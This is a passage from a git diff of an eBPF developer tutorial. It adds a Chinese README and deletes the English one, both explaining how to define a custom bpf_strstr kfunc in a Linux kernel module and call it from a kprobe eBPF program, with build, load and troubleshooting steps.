+最棒的是,你可以在不修改核心内核的情况下实现这一目标,保持系统的稳定性和代码的安全性。 + +在本教程中,我们将展示如何定义自定义 kfunc 以填补 eBPF 功能的任何空白。我们将逐步讲解如何创建一个引入新 kfunc 的内核模块,并演示如何在 eBPF 程序中使用它们。无论你是希望克服性能瓶颈,还是需要 eBPF 运行时未提供的功能,自定义 kfunc 都能为你的项目解锁新的可能性。 + +## 理解 kfunc:扩展 eBPF 超越辅助函数 + +### 什么是 kfunc? + +**BPF 内核函数(kfuncs)** 是 Linux 内核中的专用函数,供 eBPF 程序使用。与标准的 eBPF 辅助函数不同,kfuncs 没有稳定的接口,并且在不同的内核版本之间可能有所变化。这种可变性意味着使用 kfuncs 的 BPF 程序需要与内核更新同步更新,以保持兼容性和稳定性。 + +### 为什么使用 kfuncs? + +1. **扩展功能:** kfuncs 允许执行标准 eBPF 辅助函数无法完成的操作。 +2. **定制化:** 定义针对特定用例量身定制的逻辑,增强 eBPF 程序的灵活性。 +3. 
**安全与稳定:** 通过将 kfuncs 封装在内核模块中,避免直接修改核心内核,保持系统完整性。
+
+### kfuncs 在 eBPF 中的角色
+
+kfuncs 作为 eBPF 程序与更深层次内核功能之间的桥梁。它们允许 eBPF 程序执行更复杂的操作,通过暴露现有内核函数或引入专为 eBPF 交互设计的新包装函数。这种集成在确保 eBPF 程序保持安全和可维护的同时,促进了更深入的内核交互。
+
+需要注意的是,Linux 内核已经包含了大量的 kfuncs。这些内置的 kfuncs 覆盖了广泛的功能,大多数开发者无需定义新的 kfuncs 就能完成任务。然而,在现有 kfuncs 无法满足特定需求的情况下,定义自定义 kfuncs 就变得必要。本教程将演示如何定义新的 kfuncs 以填补任何空白,确保你的 eBPF 程序能够利用你所需的确切功能。eBPF 也可以扩展到用户空间。在用户空间 eBPF 运行时 [bpftime](https://github.com/eunomia-bpf/bpftime) 中,我们也在实现 ufuncs,它们类似于 kfuncs,但扩展了用户空间应用程序。
+
+## kfuncs 及其演变概述
+
+要理解 kfuncs 的重要性,必须了解它们与 eBPF 辅助函数的演变关系。
+
+![累计辅助函数和 kfunc 时间线](https://raw.githubusercontent.com/eunomia-bpf/code-survey/main/imgs/cumulative_helper_kfunc_timeline.png)
+
+**关键要点:**
+
+- **辅助函数的稳定性:** eBPF 辅助函数保持了高度的稳定性,新增内容较少。
+- **kfuncs 的快速增长:** kfuncs 的采用和创建显著增加,表明社区有兴趣通过 kfuncs 扩展内核交互。
+- **向更深层次内核集成的转变:** 自 2023 年以来,新的用例主要利用 kfuncs 影响内核行为,显示出通过 kfuncs 实现更深层次内核集成的趋势。
+
+这一趋势凸显了社区通过 kfuncs 更深入地与内核集成,推动 eBPF 能力边界的决心。
+
+## 定义你自己的 kfunc:分步指南
+
+为了利用 kfuncs 的强大功能,你需要在内核模块中定义它们。这个过程确保你的自定义函数能够安全地暴露给 eBPF 程序,而无需修改核心内核。
+
+### 编写内核模块
+
+让我们从创建一个简单的内核模块开始,该模块定义一个 `strstr` kfunc。这个 kfunc 将执行子字符串搜索操作,作为理解机制的基础。
+
+#### **文件:`hello.c`**
+
+```c
+#include <linux/init.h>    // 模块初始化宏
+#include <linux/module.h>  // 加载模块的核心头文件
+#include <linux/kernel.h>  // 内核日志宏
+#include <linux/bpf.h>
+#include <linux/btf.h>
+#include <linux/btf_ids.h>
+
+/* 声明 kfunc 原型 */
+__bpf_kfunc int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz);
+
+/* 开始 kfunc 定义 */
+__bpf_kfunc_start_defs();
+
+/* 定义 bpf_strstr kfunc */
+__bpf_kfunc int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz)
+{
+    // 边界情况:如果 substr 为空,返回 0(假设空字符串在开始处找到)
+    if (substr__sz == 0)
+    {
+        return 0;
+    }
+    // 边界情况:如果子字符串比主字符串长,则无法找到
+    if (substr__sz > str__sz)
+    {
+        return -1; // 返回 -1 表示未找到
+    }
+    // 遍历主字符串,考虑大小限制
+    for (size_t i = 0; i <= str__sz - substr__sz; i++)
+    {
+        size_t j = 0;
+        // 将子字符串与当前主字符串位置进行比较
+        while (j < substr__sz && str[i + j] == substr[j])
+        {
+            j++;
+        }
+        // 如果整个子字符串都匹配
+        if (j == substr__sz)
+        {
+            return i; // 返回第一次匹配的索引
+        }
+    }
+    // 如果未找到子字符串,返回 -1
+    return -1;
+}
+
+/* 结束 kfunc 定义 */
+__bpf_kfunc_end_defs();
+
+/* 定义 BTF kfuncs ID 集 */
+BTF_KFUNCS_START(bpf_kfunc_example_ids_set)
+BTF_ID_FLAGS(func, bpf_strstr)
+BTF_KFUNCS_END(bpf_kfunc_example_ids_set)
+
+/* 注册 kfunc ID 集 */
+static const struct btf_kfunc_id_set bpf_kfunc_example_set = {
+    .owner = THIS_MODULE,
+    .set = &bpf_kfunc_example_ids_set,
+};
+
+/* 模块加载时执行的函数 */
+static int __init hello_init(void)
+{
+    int ret;
+
+    printk(KERN_INFO "Hello, world!\n");
+    /* 注册 BPF_PROG_TYPE_KPROBE 的 BTF kfunc ID 集 */
+    ret = register_btf_kfunc_id_set(BPF_PROG_TYPE_KPROBE, &bpf_kfunc_example_set);
+    if (ret)
+    {
+        pr_err("bpf_kfunc_example: 注册 BTF kfunc ID 集失败\n");
+        return ret;
+    }
+    printk(KERN_INFO "bpf_kfunc_example: 模块加载成功\n");
+    return 0; // 成功返回 0
+}
+
+/* 模块卸载时执行的函数 */
+static void __exit hello_exit(void)
+{
+    /* 取消注册 BTF kfunc ID 集 */
+    unregister_btf_kfunc_id_set(BPF_PROG_TYPE_KPROBE, &bpf_kfunc_example_set);
+    printk(KERN_INFO "再见,世界!\n");
+}
+
+/* 定义模块的初始化和退出点的宏 */
+module_init(hello_init);
+module_exit(hello_exit);
+
+MODULE_LICENSE("GPL");           // 许可证类型(GPL)
+MODULE_AUTHOR("Your Name");      // 模块作者
+MODULE_DESCRIPTION("一个简单的模块"); // 模块描述
+MODULE_VERSION("1.0");           // 模块版本
+```
+
+**代码解释:**
+
+- **声明 kfunc:** `__bpf_kfunc` 宏声明一个 eBPF 程序可以调用的函数。在这里,`bpf_strstr` 执行给定字符串中的子字符串搜索。
+
+- **BTF 定义:** `__bpf_kfunc_start_defs` 和 `__bpf_kfunc_end_defs` 宏标示 kfunc 定义的开始和结束。`BTF_KFUNCS_START` 及相关宏帮助将 kfuncs 注册到 BPF 类型格式(BTF)。
+
+- **模块初始化:** `hello_init` 函数注册 kfunc ID 集,使 `bpf_strstr` 可用于 `BPF_PROG_TYPE_KPROBE` 类型的
eBPF 程序。
+
+- **模块清理:** `hello_exit` 函数确保在模块移除时取消注册 kfunc ID 集,保持系统整洁。
+
+#### **文件:`Makefile`**
+
+```makefile
+obj-m += hello.o  # hello.o 是目标
+
+# 启用 BTF 生成
+KBUILD_CFLAGS += -g -O2
+
+all:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
+```
+
+**Makefile 解释:**
+
+- **目标定义:** `obj-m += hello.o` 指定 `hello.o` 是要构建的模块。
+
+- **BTF 生成标志:** `KBUILD_CFLAGS += -g -O2` 启用调试信息和优化,便于 BTF 生成。
+
+- **构建命令:**
+  - **`all`:** 通过调用内核构建系统编译内核模块。
+  - **`clean`:** 清理构建产物。
+
+**注意:** 提供的代码在 Linux 内核版本 **6.11** 上进行了测试。如果你使用的是较早的版本,可能需要实现一些变通方法,例如引用 `compact.h`。
+
+### 编译内核模块
+
+在内核模块源代码和 Makefile 就位后,按照以下步骤编译模块:
+
+1. **导航到模块目录:**
+
+   ```bash
+   cd /path/to/bpf-developer-tutorial/src/43-kfuncs/module/
+   ```
+
+2. **编译模块:**
+
+   ```bash
+   make
+   ```
+
+   该命令将生成一个名为 `hello.ko` 的文件,即编译后的内核模块。
+
+### 加载内核模块
+
+要将编译好的模块插入内核,使用 `insmod` 命令:
+
+```bash
+sudo insmod hello.ko
+```
+
+### 验证模块加载
+
+加载模块后,通过检查内核日志验证其是否成功插入:
+
+```bash
+dmesg | tail
+```
+
+**预期输出:**
+
+```txt
+[ 1234.5678] Hello, world!
+[ 1234.5679] bpf_kfunc_example: 模块加载成功
+```
+
+### 移除内核模块
+
+当不再需要该模块时,使用 `rmmod` 命令卸载它:
+
+```bash
+sudo rmmod hello
+```
+
+**验证移除:**
+
+```bash
+dmesg | tail
+```
+
+**预期输出:**
+
+```txt
+[ 1234.9876] 再见,世界!
+```
+
+## 处理编译错误
+
+在编译过程中,可能会遇到以下错误:
+
+```txt
+Skipping BTF generation for /root/bpf-developer-tutorial/src/43-kfuncs/module/hello.ko due to unavailability of vmlinux
+```
+
+**解决方案:**
+
+1. **安装 `dwarves` 包:**
+
+   `dwarves` 包提供了生成 BTF 所需的工具。
+
+   ```sh
+   sudo apt install dwarves
+   ```
+
+2. **复制 `vmlinux` 文件:**
+
+   确保包含 BTF 信息的 `vmlinux` 文件在构建目录中可用。
+
+   ```sh
+   sudo cp /sys/kernel/btf/vmlinux /usr/lib/modules/$(uname -r)/build/
+   ```
+
+   该命令将 `vmlinux` 文件复制到适当的构建目录,确保成功生成 BTF。
+
+本教程的完整代码可在 [bpf-developer-tutorial 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/43-kfuncs) 的 GitHub 上找到。此代码在 Linux 内核版本 6.11 上进行了测试,对于较低版本,可能需要参考 `compact.h` 进行一些修改。
+
+## 在 eBPF 程序中使用自定义 kfunc
+
+有了定义自定义 `strstr` kfunc 的内核模块后,下一步是创建一个利用此函数的 eBPF 程序。此交互展示了 kfuncs 引入的增强功能。
+
+### 编写 eBPF 程序
+
+创建一个附加到 `do_unlinkat` 内核函数并使用自定义 `bpf_strstr` kfunc 的 eBPF 程序。
+
+#### **文件:`kfunc.c`**
+
+```c
+/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */
+#define BPF_NO_GLOBAL_DATA
+#include <linux/bpf.h>
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_tracing.h>
+
+typedef unsigned int u32;
+typedef long long s64;
+
+/* 声明外部 kfunc */
+extern int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz) __ksym;
+
+char LICENSE[] SEC("license") = "Dual BSD/GPL";
+
+SEC("kprobe/do_unlinkat")
+int handle_kprobe(struct pt_regs *ctx)
+{
+    pid_t pid = bpf_get_current_pid_tgid() >> 32;
+    char str[] = "Hello, world!";
+    char substr[] = "wor";
+    int result = bpf_strstr(str, sizeof(str) - 1, substr, sizeof(substr) - 1);
+    if (result != -1)
+    {
+        bpf_printk("'%s' found in '%s' at index %d\n", substr, str, result);
+    }
+    bpf_printk("Hello, world!
(pid: %d) bpf_strstr %d\n", pid, result); + return 0; +} +``` + +**eBPF 代码解释:** + +- **外部 kfunc 声明:** `extern` 关键字声明 `bpf_strstr` 函数,使其在 eBPF 程序中可用。 + +- **Kprobe 附加:** `SEC("kprobe/do_unlinkat")` 宏将 eBPF 程序附加到 `do_unlinkat` 内核函数。每次调用 `do_unlinkat` 时,`handle_kprobe` 函数都会执行。 + +- **使用 kfunc:** 在 `handle_kprobe` 中,eBPF 程序调用 `bpf_strstr`,传入四个参数: + - `str`: 要搜索的主字符串。 + - `str__sz`: 主字符串的大小。 + - `substr`: 要搜索的子字符串。 + - `substr__sz`: 子字符串的大小。 + + 结果(子字符串在主字符串中的首次出现索引,或 -1 表示未找到)然后通过 `bpf_printk` 打印,显示 PID 和结果。 + +**重要提示:** 由于验证器限制,直接在 eBPF 中实现类似 `strstr` 的函数具有挑战性,因为这限制了循环和复杂的内存访问。通过将 `strstr` 实现为 kfunc,我们绕过了这些限制,使得在 eBPF 程序中执行更复杂和高效的字符串操作成为可能。 + +### 编译 eBPF 程序 + +要编译 eBPF 程序,确保你已安装必要的工具,如 `clang` 和 `llvm`。以下是编译程序的步骤: + +1. **导航到 eBPF 程序目录:** + + ```bash + cd /path/to/bpf-developer-tutorial/src/43-kfuncs/ + ``` + +2. **为 eBPF 程序创建一个 `Makefile`:** + + ```makefile + # 文件:Makefile + + CLANG ?= clang + LLVM_STRIP ?= llvm-strip + BPF_TARGET := bpf + + CFLAGS := -O2 -g -target $(BPF_TARGET) -Wall -Werror -I/usr/include + + all: kfunc.o + + kfunc.o: kfunc.c + $(CLANG) $(CFLAGS) -c $< -o $@ + + clean: + rm -f kfunc.o + ``` + +3. **编译 eBPF 程序:** + + ```bash + make + ``` + + 该命令将生成一个名为 `kfunc.o` 的文件,即编译后的 eBPF 对象文件。 + +### 运行 eBPF 程序 + +假设你有一个用户空间应用程序或工具来加载和附加 eBPF 程序,你可以执行它以观察 eBPF 程序与自定义 kfunc 之间的交互。 + +**示例输出:** + +```bash +# sudo ./load_kfunc +BPF 程序已加载并成功附加。按 Ctrl-C 退出。 +``` + +然后,当调用 `do_unlinkat` 函数时(例如,当文件被取消链接时),你可以检查内核日志: + +```bash +dmesg | tail +``` + +**预期输出:** + +```txt +[ 1234.5678] 'wor' found in 'Hello, world!' at index 7 +[ 1234.5679] Hello, world! (pid: 2075) bpf_strstr 7 +``` + +**输出解释:** + +每次内核调用 `do_unlinkat` 函数时,eBPF 程序都会打印一条消息,指示进程的 PID 以及 kfunc 调用的结果。在此示例中,子字符串 `"wor"` 在字符串 `"Hello, world!"` 的索引 `7` 处被找到。 + +## 总结与结论 + +在本教程中,我们深入探讨了通过定义和使用自定义内核函数(kfuncs)来扩展 eBPF 的能力。以下是我们涵盖的内容回顾: + +- **理解 kfuncs:** 理解了 kfuncs 的概念及其在标准辅助函数之外增强 eBPF 的角色。 +- **定义 kfuncs:** 创建了一个内核模块,定义了自定义的 `strstr` kfunc,确保其能够安全地暴露给 eBPF 程序,而无需修改核心内核。 +- **编写包含 kfuncs 的 eBPF 程序:** 开发了一个利用自定义 kfunc 的 eBPF 程序,展示了增强的功能。 +- **编译与执行:** 提供了逐步指南,编译、加载并运行内核模块和 eBPF 程序,确保你可以在自己的系统上复制设置。 +- **错误处理:** 解决了潜在的编译问题,并提供了解决方案,确保顺利的开发体验。 + +**关键要点:** + +- **克服辅助函数的限制:** kfuncs 弥合了标准 eBPF 辅助函数留下的空白,提供了针对特定需求的扩展功能。 +- **维护系统稳定性:** 通过将 kfuncs 封装在内核模块中,确保系统稳定性,而无需对内核进行侵入性更改。 +- **社区驱动的演变:** kfuncs 的快速增长和采用凸显了 eBPF 社区致力于通过 kfuncs 推动内核级编程可能性的决心。 +- **利用现有 kfuncs:** 在定义新的 kfuncs 之前,探索内核提供的现有 kfuncs。它们涵盖了广泛的功能,减少了除非绝对必要,否则无需创建自定义函数的需求。 + +**准备好进一步提升你的 eBPF 技能了吗?** [访问我们的教程仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial)并[探索我们网站上的更多教程](https://eunomia.dev/tutorials/)。深入丰富的示例,深化你的理解,并为 eBPF 的动态世界做出贡献! + +祝你在 eBPF 的旅程中愉快! + +## 参考资料 + +- [BPF 内核函数文档](https://docs.kernel.org/bpf/kfuncs.html) +- [eBPF kfuncs 指南](https://docs.ebpf.io/linux/kfuncs/) + +## 附加资源 + +如果你想了解更多关于 eBPF 的知识和实践,可以访问我们的开源教程代码仓库 [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或访问我们的网站 [eunomia.dev/tutorials](https://eunomia.dev/tutorials/) 以获取更多示例和完整代码。 diff --git a/src/43-kfuncs/README_en.md b/src/43-kfuncs/README_en.md deleted file mode 100644 index a3ba587..0000000 --- a/src/43-kfuncs/README_en.md +++ /dev/null @@ -1,445 +0,0 @@ -# Extending eBPF Beyond Its Limits: Custom kfuncs in Kernel Modules - -Have you ever felt constrained by eBPF's capabilities? Maybe you've run into situations where the existing eBPF features just aren't enough to accomplish your goals. Perhaps you need deeper interactions with the kernel, or you're facing performance issues that the standard eBPF runtime can't solve. 
If you've ever wished for more flexibility and power in your eBPF programs, this tutorial is for you. - -## Introduction: Adding a `strstr` kfunc to Break Free from eBPF Runtime Limitations - -**eBPF (extended Berkeley Packet Filter)** has revolutionized Linux system programming by allowing developers to run sandboxed programs inside the kernel. It's a game-changer for networking, security, and observability, enabling powerful functionalities without the need to modify kernel source code or load traditional kernel modules. - -But as amazing as eBPF is, it isn't without its limitations: - -- **Functionality Gaps:** Sometimes, the existing features of the eBPF runtime don't provide the specific capabilities you need. -- **Complex Requirements:** Certain tasks demand more intricate kernel interactions that eBPF can't handle out of the box. -- **Performance Issues:** In some cases, the overhead of the eBPF runtime introduces latency or isn't efficient enough for high-performance requirements. - -These challenges stem from the limitations of the **entire eBPF runtime**, not just its helper functions. So how do you overcome these hurdles without altering the kernel itself? - -Enter **kfuncs (BPF Kernel Functions)**. By defining your own kfuncs within kernel modules, you can extend eBPF's capabilities beyond its default limitations. This approach lets you: - -- **Enhance Functionality:** Introduce new operations that aren't available in the standard eBPF runtime. -- **Customize Behavior:** Tailor kernel interactions to fit your specific needs. -- **Boost Performance:** Optimize critical paths by executing custom code directly in the kernel context. - -**In this tutorial, we'll specifically add a `strstr` kfunc.** While implementing a string search directly in eBPF is challenging due to verifier restrictions, defining it as a kfunc allows us to bypass these limitations and perform more complex operations safely and efficiently. - -Best of all, you achieve this without modifying the core kernel, keeping your system stable and your code safe. - -In this tutorial, we'll show you how to define custom kfuncs to fill any gaps in eBPF's capabilities. We'll walk through creating a kernel module that introduces new kfuncs and demonstrate how to use them in your eBPF programs. Whether you're looking to overcome performance bottlenecks or need features the eBPF runtime doesn't offer, custom kfuncs can unlock new possibilities for your projects. - -## Understanding kfunc: Extending eBPF Beyond Helpers - -### What Are kfuncs? - -**BPF Kernel Functions (kfuncs)** are specialized functions within the Linux kernel that are exposed for use by eBPF programs. Unlike standard eBPF helpers, kfuncs do not have a stable interface and can vary between kernel releases. This variability means that BPF programs utilizing kfuncs need to be updated in tandem with kernel updates to maintain compatibility and stability. - -### Why Use kfuncs? - -1. **Extended Functionality:** kfuncs enable operations that standard eBPF helpers cannot perform. -2. **Customization:** Define logic tailored to specific use cases, enhancing the flexibility of eBPF programs. -3. **Safety and Stability:** By encapsulating kfuncs within kernel modules, you avoid direct modifications to the core kernel, preserving system integrity. - -### How kfuncs Fit into eBPF - -kfuncs serve as bridges between eBPF programs and deeper kernel functionalities. 
They allow eBPF programs to perform more intricate operations by either exposing existing kernel functions or introducing new wrappers specifically designed for eBPF interactions. This integration facilitates deeper kernel interactions while ensuring that eBPF programs remain safe and maintainable. - -It's important to note that the Linux kernel already includes a plethora of kfuncs. These built-in kfuncs cover a wide range of functionalities, allowing most developers to accomplish their tasks without the need to define new ones. However, in cases where the existing kfuncs do not meet specific requirements, defining custom kfuncs becomes necessary. This tutorial demonstrates how to define new kfuncs to fill any gaps, ensuring that your eBPF programs can leverage the exact functionality you need. eBPF can also be extended to userspace. In the userspace eBPF runtime [bpftime](https://github.com/eunomia-bpf/bpftime), we are also implementing ufuncs, which are similar to kfuncs but extend userspace applications. - -## Overview of kfuncs and Their Evolution - -To appreciate the significance of kfuncs, it's essential to understand their evolution in relation to eBPF helper functions. - -![Cumulative Helper and kfunc Timeline](https://raw.githubusercontent.com/eunomia-bpf/code-survey/main/imgs/cumulative_helper_kfunc_timeline.png) - -**Key Takeaways:** - -- **Stability of Helper Functions:** eBPF helper functions have remained largely stable, with minimal new additions. -- **Rapid Growth of kfuncs:** There's been a significant increase in the adoption and creation of kfuncs, indicating the community's interest in expanding kernel interactions via kfuncs. -- **Shift Towards Deeper Kernel Integrations:** Since 2023, new use cases predominantly leverage kfuncs to influence kernel behavior, signaling a trend towards more profound kernel integrations through eBPF. - -This trend underscores the community's drive to push the boundaries of what eBPF can achieve by integrating more deeply with the kernel through kfuncs. - -## Defining Your Own kfunc: A Step-by-Step Guide - -To harness the power of kfuncs, you'll need to define them within a kernel module. This process ensures that your custom functions are safely exposed to eBPF programs without altering the core kernel. - -### Writing the Kernel Module - -Let's start by creating a simple kernel module that defines a `strstr` kfunc. This kfunc will perform a substring search operation, serving as a foundation for understanding the mechanics. 
-#### **File: `hello.c`**
-
-```c
-#include <linux/init.h>    // Macros for module initialization
-#include <linux/module.h>  // Core header for loading modules
-#include <linux/kernel.h>  // Kernel logging macros
-#include <linux/bpf.h>
-#include <linux/btf.h>
-#include <linux/btf_ids.h>
-
-/* Declare the kfunc prototype */
-__bpf_kfunc int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz);
-
-/* Begin kfunc definitions */
-__bpf_kfunc_start_defs();
-
-/* Define the bpf_strstr kfunc */
-__bpf_kfunc int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz)
-{
-    // Edge case: if substr is empty, return 0 (assuming empty string is found at the start)
-    if (substr__sz == 0)
-    {
-        return 0;
-    }
-    // Edge case: if the substring is longer than the main string, it's impossible to find
-    if (substr__sz > str__sz)
-    {
-        return -1; // Return -1 to indicate not found
-    }
-    // Iterate through the main string, considering the size limit
-    for (size_t i = 0; i <= str__sz - substr__sz; i++)
-    {
-        size_t j = 0;
-        // Compare the substring with the current position in the string
-        while (j < substr__sz && str[i + j] == substr[j])
-        {
-            j++;
-        }
-        // If the entire substring was found
-        if (j == substr__sz)
-        {
-            return i; // Return the index of the first match
-        }
-    }
-    // Return -1 if the substring is not found
-    return -1;
-}
-
-/* End kfunc definitions */
-__bpf_kfunc_end_defs();
-
-/* Define the BTF kfuncs ID set */
-BTF_KFUNCS_START(bpf_kfunc_example_ids_set)
-BTF_ID_FLAGS(func, bpf_strstr)
-BTF_KFUNCS_END(bpf_kfunc_example_ids_set)
-
-/* Register the kfunc ID set */
-static const struct btf_kfunc_id_set bpf_kfunc_example_set = {
-    .owner = THIS_MODULE,
-    .set = &bpf_kfunc_example_ids_set,
-};
-
-/* Function executed when the module is loaded */
-static int __init hello_init(void)
-{
-    int ret;
-
-    printk(KERN_INFO "Hello, world!\n");
-    /* Register the BTF kfunc ID set for BPF_PROG_TYPE_KPROBE */
-    ret = register_btf_kfunc_id_set(BPF_PROG_TYPE_KPROBE, &bpf_kfunc_example_set);
-    if (ret)
-    {
-        pr_err("bpf_kfunc_example: Failed to register BTF kfunc ID set\n");
-        return ret;
-    }
-    printk(KERN_INFO "bpf_kfunc_example: Module loaded successfully\n");
-    return 0; // Return 0 if successful
-}
-
-/* Function executed when the module is removed */
-static void __exit hello_exit(void)
-{
-    /* Unregister the BTF kfunc ID set */
-    unregister_btf_kfunc_id_set(BPF_PROG_TYPE_KPROBE, &bpf_kfunc_example_set);
-    printk(KERN_INFO "Goodbye, world!\n");
-}
-
-/* Macros to define the module's init and exit points */
-module_init(hello_init);
-module_exit(hello_exit);
-
-MODULE_LICENSE("GPL");                 // License type (GPL)
-MODULE_AUTHOR("Your Name");            // Module author
-MODULE_DESCRIPTION("A simple module"); // Module description
-MODULE_VERSION("1.0");                 // Module version
-```
-
-**Explanation of the Code:**
-
-- **Declaring the kfunc:** The `__bpf_kfunc` macro declares a function that eBPF programs can invoke. Here, `bpf_strstr` performs a substring search within a given string.
-
-- **BTF Definitions:** The `__bpf_kfunc_start_defs` and `__bpf_kfunc_end_defs` macros demarcate the beginning and end of kfunc definitions. The `BTF_KFUNCS_START` and related macros assist in registering the kfuncs with the BPF Type Format (BTF).
-
-- **Module Initialization:** The `hello_init` function registers the kfunc ID set, making `bpf_strstr` available to eBPF programs of type `BPF_PROG_TYPE_KPROBE`.
-
-- **Module Cleanup:** The `hello_exit` function ensures that the kfunc ID set is unregistered upon module removal, maintaining system cleanliness.
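-
-One convention worth highlighting in the signature above is the `__sz` suffix. For kfuncs, a parameter named `foo__sz` is paired by the verifier with the pointer parameter immediately before it, and the verifier checks that the calling eBPF program really passes a buffer of at least that size. This is what makes it safe for `bpf_strstr` to loop over raw buffers handed in from eBPF. A hypothetical kfunc using the same pattern for a single buffer might look like this (it would be registered exactly like `bpf_strstr` above):
-
-```c
-/* Hypothetical example of the __sz annotation: "mem" and "mem__sz" are
- * paired, so the verifier rejects callers whose buffer is smaller than
- * the size they claim to pass. */
-__bpf_kfunc int bpf_sum_bytes(const char *mem, u32 mem__sz)
-{
-    int sum = 0;
-    for (u32 i = 0; i < mem__sz; i++)
-        sum += mem[i];
-    return sum;
-}
-```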
- -#### **File: `Makefile`** - -```makefile -obj-m += hello.o # hello.o is the target - -# Enable BTF generation -KBUILD_CFLAGS += -g -O2 - -all: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules - -clean: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean -``` - -**Explanation of the Makefile:** - -- **Target Definition:** `obj-m += hello.o` specifies that `hello.o` is the module to be built. - -- **BTF Generation Flags:** `KBUILD_CFLAGS += -g -O2` enables debug information and optimization, facilitating BTF generation. - -- **Build Commands:** - - **`all`:** Compiles the kernel module by invoking the kernel build system. - - **`clean`:** Cleans up the build artifacts. - -**Note:** The provided code has been tested on Linux kernel version **6.11**. If you're using an earlier version, you might need to implement workarounds, such as referencing `compact.h`. - -### Compiling the Kernel Module - -With the kernel module source and Makefile in place, follow these steps to compile the module: - -1. **Navigate to the Module Directory:** - - ```bash - cd /path/to/bpf-developer-tutorial/src/43-kfuncs/module/ - ``` - -2. **Compile the Module:** - - ```bash - make - ``` - - This command will generate a file named `hello.ko`, which is the compiled kernel module. - -### Loading the Kernel Module - -To insert the compiled module into the kernel, use the `insmod` command: - -```bash -sudo insmod hello.ko -``` - -### Verifying Module Loading - -After loading the module, verify its successful insertion by checking the kernel logs: - -```bash -dmesg | tail -``` - -**Expected Output:** - -```txt -[ 1234.5678] Hello, world! -[ 1234.5679] bpf_kfunc_example: Module loaded successfully -``` - -### Removing the Kernel Module - -When you no longer need the module, unload it using the `rmmod` command: - -```bash -sudo rmmod hello -``` - -**Verify Removal:** - -```bash -dmesg | tail -``` - -**Expected Output:** - -```txt -[ 1234.9876] Goodbye, world! -``` - -## Handling Compilation Errors - -During the compilation process, you might encounter the following error: - -```txt -Skipping BTF generation for /root/bpf-developer-tutorial/src/43-kfuncs/module/hello.ko due to unavailability of vmlinux -``` - -**Solution:** - -1. **Install the `dwarves` Package:** - - The `dwarves` package provides tools necessary for BTF generation. - - ```sh - sudo apt install dwarves - ``` - -2. **Copy the `vmlinux` File:** - - Ensure that the `vmlinux` file, which contains BTF information, is available in the build directory. - - ```sh - sudo cp /sys/kernel/btf/vmlinux /usr/lib/modules/$(uname -r)/build/ - ``` - - This command copies the `vmlinux` file to the appropriate build directory, enabling successful BTF generation. - -The complete code for this tutorial can be found in the [bpf-developer-tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/43-kfuncs) on GitHub. This is tested on Linux kernel version 6.11, and some modifications may be required for lower versions, referring to `compact.h`. - -## Utilizing Your Custom kfunc in an eBPF Program - -With the kernel module defining your custom `strstr` kfunc in place, the next step is to create an eBPF program that leverages this function. This interaction showcases the enhanced capabilities introduced by kfuncs. - -### Writing the eBPF Program - -Create an eBPF program that attaches to the `do_unlinkat` kernel function and uses the custom `bpf_strstr` kfunc. 
- -#### **File: `kfunc.c`** - -```c -/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ -#define BPF_NO_GLOBAL_DATA -#include <linux/bpf.h> -#include <bpf/bpf_helpers.h> -#include <bpf/bpf_tracing.h> - -typedef unsigned int u32; -typedef int pid_t; // not provided by the headers above -typedef long long s64; - -/* Declare the external kfunc */ -extern int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz) __ksym; - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -SEC("kprobe/do_unlinkat") -int handle_kprobe(struct pt_regs *ctx) -{ - pid_t pid = bpf_get_current_pid_tgid() >> 32; - char str[] = "Hello, world!"; - char substr[] = "wor"; - int result = bpf_strstr(str, sizeof(str) - 1, substr, sizeof(substr) - 1); - if (result != -1) - { - bpf_printk("'%s' found in '%s' at index %d\n", substr, str, result); - } - bpf_printk("Hello, world! (pid: %d) bpf_strstr %d\n", pid, result); - return 0; -} -``` - -**Explanation of the eBPF Code:** - -- **External kfunc Declaration:** The `extern` keyword declares the `bpf_strstr` function, making it accessible within the eBPF program. - -- **Kprobe Attachment:** The `SEC("kprobe/do_unlinkat")` macro attaches the eBPF program to the `do_unlinkat` kernel function. Every time `do_unlinkat` is invoked, the `handle_kprobe` function executes. - -- **Using the kfunc:** Within `handle_kprobe`, the eBPF program calls `bpf_strstr` with four arguments: - - `str`: The main string to search within. - - `str__sz`: The size of the main string. - - `substr`: The substring to search for. - - `substr__sz`: The size of the substring. - - The result, which is the index of the first occurrence of `substr` in `str` or `-1` if not found, is then printed using `bpf_printk`, displaying both the PID and the result. - -**Important Note:** Implementing a `strstr`-like function directly in eBPF is challenging due to verifier restrictions that limit loops and complex memory accesses. By implementing `strstr` as a kfunc, we bypass these limitations, allowing for more complex and efficient string operations within eBPF programs. - -### Compiling the eBPF Program - -To compile the eBPF program, ensure you have the necessary tools installed, such as `clang` and `llvm`. Here's how you can compile the program: - -1. **Navigate to the eBPF Program Directory:** - - ```bash - cd /path/to/bpf-developer-tutorial/src/43-kfuncs/ - ``` - -2. **Create a `Makefile` for the eBPF Program:** - - ```makefile - # File: Makefile - - CLANG ?= clang - LLVM_STRIP ?= llvm-strip - BPF_TARGET := bpf - - CFLAGS := -O2 -g -target $(BPF_TARGET) -Wall -Werror -I/usr/include - - all: kfunc.o - - kfunc.o: kfunc.c - $(CLANG) $(CFLAGS) -c $< -o $@ - - clean: - rm -f kfunc.o - ``` - -3. **Compile the eBPF Program:** - - ```bash - make - ``` - - This command will generate a file named `kfunc.o`, which is the compiled eBPF object file. - -### Running the eBPF Program - -Assuming you have a user-space application or a tool to load and attach the 